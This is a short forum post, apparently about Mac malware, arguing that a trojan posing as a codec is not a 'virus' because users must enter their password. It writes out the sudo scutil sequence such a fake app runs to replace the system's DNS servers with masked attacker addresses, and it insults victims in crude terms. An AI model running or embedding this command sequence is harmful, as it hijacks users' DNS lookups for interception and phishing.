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Here, let me explain rather than shooting off..
You create a mac app, that once it runs it fires this command
sudo scutil
> open
> d.init
> d.add ServerAddresses * xxx.xx.xx.xx xxx.xx.xx.xx
> d.add DomainName apple.co.uk
> set State:/Network/Service/PRIMARY_SERVICE_ID/DNS
> quit
It'll ask the user for their password.. if the user is FUCKING STUPID they will enter their password and their DNS look ups will be changed, with isn't good for obvious reasons..
However, my posts are correct, this is NOT a virus.
This is a program disguised as another, and it can't spread on it's own, you can ONLY be infected if you provide your password, and if you provide your ROOT password to some codec you downloaded off a porn site you're STUPID, which goes to prove my point that Apple is "protecting the stupid" with their suggestion to install anti- malware programs.
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